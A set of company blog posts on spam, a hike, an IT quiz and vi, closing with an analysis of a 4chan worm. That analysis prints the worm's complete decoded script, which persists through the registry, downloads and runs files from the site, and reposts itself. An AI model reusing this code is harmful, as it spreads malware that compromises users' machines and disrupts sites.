Look ma! Tables!

Sorry for the rarity of updates, my head (and days) has been so full of the last pre-release issues lately that I can't find the time to post about anything worthy -- including, for example, the epic fight with the JVM that fails misteriously every now and then if it cannot find /proc where it expects it and fails just the same, but for a totally different reason and on each and every run, if it can. (Kudos to the tireless tester of ours that kept trying out different versions of Java until he found one that produced a never before seen error message that yielded one single Google hit that brought us to the solution.)

However, this is something worth mentioning. I mean, we've seen all kinds of spam that desperately tries to get pass through the ever-growing wall of bayesian filters. Deliberate mispellings, images that get filtered, adding whole paragraphs of bogus sentences -- we've seen them all. But using a colored HTML table to get the name of the Blue Pill to our screens: wow, that's clever.

This is what landed in my mailbox today:



And here's the HTML that Blogger seems to mess up badly:



Do we have to start writing OCR for HTML tables?

Geeks in Nature

Yesterday I went out for a hike with some old friends to enjoy the weather that's finally got warm enough to go out and to get away from the rush of the soon-to-be-ready SSB 1.0.2 release for a day. Nothing too serious, only ~15kms in the hills near Buda with some pretty steep slopes to climb.



Five guys, three girls, light showers, thick mud, hiking boots, backpacks, the beautiful forest, sandwiches, flasks of water, some home-produced wine from a friend's vineyard -- seems like nice old-shool outdoorsman stuff, a great day away from computer screens and networks, right? Well, here's how it actually looked like:

• the invitation to the trip was sent out in a blog post
• we RSVP'd on Doodle
• we arranged the last-minute details using IM, for which the exactly used protocols we didn't even know as most of us tend to use clients that aggregate 4-5 different IM accounts
• the timetable for all the buses and trams we had to use was fetched on-the-spot from the website of Budapest Transport with our phones
• on the long bus trip, one of the guys entertained us by scoring us on a funny quiz from a news website
• until we got out of urban areas, we used GPS and Google Maps for navigation, only then did we switch to a proper, printed hiker's map
• when we ran out of online map coverage ("Well, we're this little balloon in the middle of...green stuff."), one of the guys bought and downloaded a GPS-based compass-software from Apple's App Store to his iPhone, only to realize that he would need to go straight ahead in one direction at least 100 meters doing at least 5 km/h to let it initialize itself, which is quite hard to do on a curvy hiking path
• we kept teasing one of the guys about the problems in Google Maps -- as he'll start working at Google in two weeks. (And who, as a strange coincidence, happened to write at least one of the proxies in Zorp here at BalaBit lots of years ago, although we've never worked together here.)
• we had a long and nice talk with a friend during the trip -- about SAP and motivational and rating systems they have at their company.
• one of the guys kept emailing a customer about a custom-made software he had a problem with throughout the whole day
• the first blogpost about the trip with geotagged photos appeared approx. 30 minutes after we got home
  

Next time we seriously need to get out of 3G coverage.

BalaBit Quiz

A couple of weeks ago I've spent the afternoon along with our HR manager, Veronika at Eötvös Loránd University: we had a booth there at an event where the companies offering internship programmes could show the students what they do and why they should choose them. It's good to be there: we'd first met the majority of the XCB team and a lot of our testers through this so-called "Cooperative Education" programme.

We wanted to find a way to test the level of knowledge of the people interested in working with us which is quick, not too tedious and even a little bit fun, so our SCB and SSB product architect, Marci put together a quick quiz and we offered BalaBit-branded T-shirts and mugs for high scores. It turned out to be a big success: most of the students enjoyed thinking about the questions and some friends I shared it with all said that it's indeed a quite entertaining questionaire for IT people. So I thought it might worth it to show it here as well -- here comes a rough translation of the original set of questions:

Which is the odd-one-out?

A, ICA
B, RDP
C, VNC
D, RPC

Which is the odd-one-out?

A, 3DES
B, RSA
C, AES
D, RC5

What does CIA stand for?

A, Complex IT Audit
B, Confidentiality, Integrity, Availability
C, Certified IT Auditor
D, Central Intelligence Agency

Which is the odd-one-out?

A, GCC
B, GDB
C, GPL
D, GIT

Which command can not be used to display the routing table in Linux?

A, route
B, ip
C, netstat
D, ifconfig

Which does not make any sense at all?

A, to strace tcpdump?
B, to tcpdump strace?
C, to attach to strace with GDB?
D, to strace GDB?

How many messages can syslog-ng, running on a current average computer, receive in a second?

A, 700
B, 7000
C, 70000
D, 700000


What's the broadcast address for the 10.20.30.32/18 network?

A, 10.20.30.255
B, 10.20.31.255
C, 10.20.63.255
D, 10.20.255.255

Why does the TCP header have a header-length field while UDP does not?

A, As TCP is a connection-oriented protocol it's necessary to know the exact length of the header.
B, The length of a UDP header is fixed.
C, TCP doesn't have mandatory header-length field, it can be used as an option.
D, This is a design error in UDP, this is why it cannot be considered a reliable data transfer protocol.


What's PMTU?

A, the value of the primary MTU on a given interface
B, the maximal packet size on a path
C, a way to flood the network
D, one of the flags in an IP packet

Which of the following can be used to process XML documents?

A, XML-SCHEMA
B, XSLT
C, DTD
D, all of the above

What does it print?

#include <stdio.h>
main()
{
char str[9] = "abcdefgh";
char *p[2];
char **pp;
p[0] = str;
p[1] = str + 4;
pp = p;

printf("%cn", *(++(*(++pp))));
}

A, b
B, d
C, f
D, Nothing, it won't even compile.

On X86_64 architecture under Linux which structure is the smallest in size?

typedef struct a
{
void *a;
char c;
int b;
} aa;

typedef struct b
{
int b;
void *a;
char c;
} bb;

typedef struct c
{
int b;
void *a;
char c;
} cc;

typedef struct d
{
char c;
void *a;
int b;
} dd;

How many of the people working at BalaBit knows how to compile a kernel?

A, 70%
B, 80%
C, 90%
D, 100%

Select the place between the brackets for the answers:
( D, B, B or D, C, D, B, C, C, B, B, B, C, A (the first one), B )

Oh, and if you scored above 10, drop a mail to cv@balabit.com. We're hiring.

The power of vi

No survey has ever been made but it's safe to assume that the majority of BalaBit's products is written in vi. There's some joe and nano usage here&there, there's Visual Studio for Windows development and Eclipse starts to get more and more space, but still, the rock-hard basis for editing code is vi. One of the big changes during the last year in our XCB group was switching to Eclipse from ad-hoc editors -- it wasn't enforced in any way, it just turned out that PDT got so good that it was worth to play around with it long enough to get it fit in into our development environment. But for lots of tasks, like debugging on a live appliance or during code integration vi is still extensively used.

It was after such a long day spent browsing through code in vi that I accidentally found out about keystroke commands in Google Reader. I know it's lame, but I never thought it'd have any -- I just pressed "j" instead of the down button just like I had done throghout the day, and it worked. I got curious and found out about all the other commands, and my Feed Reading Experience (TM) just got 100% percent better.

Last evening I was browsing through my 2000+ unread items in GR (hey, it was a busy week and I'm interested in lots of stuff), I got interested in comments for a Slashdot story and went on to read them (button "v", for the record). It was after spending 10 minutes reading the comments when I realized that I've been moving around with the "j" and "k" buttons. And "h" and "l" works as well. Vi power, everywhere.

So I've spent the sleepy beginning of this day while waiting for my morning coffee to kick in to look around places in SCB and SSB where the standard vi "h-j-k-l" commands could be used -- moving around configuration blocks and pages or something like that. Partly as a usability feature, yes. But mainly as a tribute to the best editor out there and as a way to give something to the hardcore nerd users, for whom, like for me, it became a second nature to use the keystrokes of vi everywhere.

Anon, you've been infct'd

For those of you who do not know: 4chan is one of the biggest and, especially it's sub-site called "/b/", the most trafficked messageboards on the net. But all these tons people do not create value, do not discuss important (or even unimportant) matters: it's complete and utter nonsense in a totally un-PC and NSFW way. To quote Wikipedia:

Douglas said of the board, "reading /b/ will melt your brain", and cited Encyclopedia Dramatica's definition of /b/ as "the asshole of the Internet". Mattathias Schwartz of The New York Times likened /b/ to a "a high-school bathroom stall, or an obscene telephone party line", while Baltimore City Paper wrote that "/b/ is the kid with a collection of butterfly knives and a locker full of porn ... in the high school of the Internet". Wired describes /b/ as notorious.

Sitting down to read /b/ is similar to watching Jerry Springer: you know it'll suck away your IQ and that any respectable person will despise you for it, but anyway, for times when you can't do anything meanful, it can be pretty much fun.

That fun was ruined a couple of days ago for all those /b/tards (that's how the frequent posters call themselves) for a day when a virus based partly on some simple Windows scripting, partly on social engineering took over the site -- and that's when it starts to get interesting from the security point of view.

The basic concept of the virus was to get the user to download an image, rename it to 4chan.jse and run it as an excutable. The image is a script written using Windows Scripting Host and it's encoded with Microsoft's script encoder to make the site's upload form accept it as an image. This script then fetches a random image from the messageboard, tries to run it as a script, and if it succeeds, it decides that it's a previously posted instance of itself and reposts it to the site, making the virus spread even more. If the fetched image is not a runnable script, it just tries to fetch another one in an infinite loop.

As Microsoft's script encoder is just a simple tool to prevent script kiddies from ripping off code used on websites, more like an obfuscator than a real encoder, the script could be decoded and the revealed WScript code is quite interesting. Not because it contains any clever tricks or elegant solutions: only because it's quite rare to see sutch a simple yet so successful virus that can be understood without any knowledge of the affected system, or hell, even the programming language it was written in. So here it goes in all it's glory, the <100 lines of code that stopped Rickrolling for one day:

GIF89aI = "x1!þ÷";
var xhr = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var ie = new ActiveXObject("InternetExplorer.Application");

"‰";
shell.currentDirectory = fso.getSpecialFolder(2);
shell.run("cmd /c copy \"" + WSH.scriptFullName + "\" sys.jse");
try {
"û";
shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysjse", "wscript /b " + fso.getSpecialFolder(2) + "\\sys.jse");
} catch(e) {}

while(1) { try {

xhr.open("get", "http://img.4chan.org/b/", 0);
"ö";
xhr.setRequestHeader("If-Modified-Since", new Date(0));
xhr.send();
var page = xhr.responseText;

try {
xhr.open("get", page.match(/<a href="(http:\/\/img\.4chan\.org\/b\/src\/\d+\....)/)[1], 0);
"è";
xhr.send();
var im = new ActiveXObject("Adodb.Stream");
im.mode = 3;
im.type = 1;
im.open();
im.write(xhr.responseBody);
im.saveToFile("j.jse", 2);
"ÿ";
shell.run("wscript /b j.jse");
} catch(e) {}

var bdry = (""+Math.random()).substr(2);
var head = "\r\n--" + bdry + "\r\nContent-Disposition: form-data; name=";

var part1 = fso.openTextFile("y", 2, 1);
"Ó";
part1.write(head + "resto\r\n\r\n" + page.match(/<span id="nothread(\d+)/)[1] + head + "upfile; filename=a.gif\r\n\r\n");
part1.close();

var part2 = fso.openTextFile("z", 2, 1);
"ú";
part2.write((""+Math.random()).substr(2) + head + "mode\r\n\r\nregist\r\n--" + bdry + "--\r\n");
part2.close();

shell.run("cmd /c copy /b y+sys.jse+z p", 0, 1);

var post = new ActiveXObject("Adodb.Stream");
"Ù";
post.mode = 3;
post.type = 1;
post.open();
post.loadFromFile("p");

try {
ie.navigate("http://img.4chan.org/b/");
do {
WSH.sleep(100);
"Å";
} while (ie.readyState != 4);
ie.stop();
ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
} catch(e) {}

"ö";
xhr.open("post", "http://dat.4chan.org/b/imgboard.php", 0);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);
xhr.send(post);

WSH.sleep(50000);

} catch(e) {} }

It turns out that it has actually been the sixth time a similar virus took down the site. There have been trickier variations that took pictures from the users's My Documents folder to use them as new containers for the program and simpler ones that simply posted the script itself along with instructions to copy-paste and save it using Notepad.

Don't even get me started on how many levels the spread of this virus could have been prevented (users not downloading and running unknown things from a site they know gathers the worst kind of crowd, captchas preventing automated posting etc.). One thing is sure: the site's administrators managed to stop the repostings and a day later, business was back to usual. And we got to see yet again how an extremely simple piece of code can bring an entire site down in a matter of hours.